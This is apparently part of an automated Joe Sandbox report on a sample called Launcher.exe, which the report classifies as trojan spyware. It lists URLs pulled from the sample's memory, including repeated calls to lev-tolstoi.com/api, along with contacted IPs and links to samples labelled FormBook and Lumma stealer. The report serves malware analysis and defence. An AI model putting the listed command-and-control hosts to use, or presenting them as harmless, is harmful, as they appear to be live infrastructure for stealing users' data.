                                                                                                                        https://lev-tolstoi.com:443/apilLauncher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://lev-tolstoi.com:443/apiiLauncher.exe, 00000003.00000003.2183979276.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.google.com/recaptcha/Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refLauncher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampoLauncher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/;Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/about/Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/my/wishlist/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://lev-tolstoi.com/erLauncher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://help.steampowered.com/en/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/market/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/news/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiLauncher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=eLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLauncher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://recaptcha.net/recaptcha/;Launcher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://lev-tolstoi.com/uoLauncher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://lev-tolstoi.com/apisLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://steamcommunity.com/discussions/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/stats/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://medal.tvLauncher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://x1.c.lencr.org/0Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://x1.i.lencr.org/0Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLauncher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://steamcommunity.com/workshop/Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbLauncher.exe, 00000003.00000003.2132993100.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allLauncher.exe, 00000003.00000003.2320485776.0000000003AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://store.steampowered.com/legal/Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://grannyejh.lat:443/api_fLauncher.exe, 00000003.00000003.2183979276.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://lev-tolstoi.com/api=Launcher.exe, 00000003.00000003.2345580376.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373917806.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2386728051.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482226766.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://lev-tolstoi.com/pSLauncher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoLauncher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://lev-tolstoi.com/5Launcher.exe, 00000003.00000003.2342965816.000000000101B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aLauncher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://lev-tolstoi.com/3Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englLauncher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://lev-tolstoi.com/apiCLauncher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://lev-tolstoi.com/api1Launcher.exe, 00000003.00000003.2343011519.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      104.21.66.86
                                                                                                                                                                                                                                      lev-tolstoi.comUnited States
                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                      23.55.153.106
                                                                                                                                                                                                                                      steamcommunity.comUnited States
                                                                                                                                                                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                      Analysis ID:1579547
                                                                                                                                                                                                                                      Start date and time:2024-12-22 23:49:04 +01:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 6m 22s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:10
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                      Sample name:Launcher.exe
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/5@11/2
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                      • Number of executed functions: 16
                                                                                                                                                                                                                                      • Number of non-executed functions: 64
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.190.147.3, 13.107.246.63, 4.175.87.197
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                      • Execution Graph export aborted for target Launcher.exe, PID 6292 because there are no executed function
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      17:49:57API Interceptor13x Sleep call for process: Launcher.exe modified
                                                                                                                                                                                                                                      17:50:25API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                      • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                      23.55.153.106file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
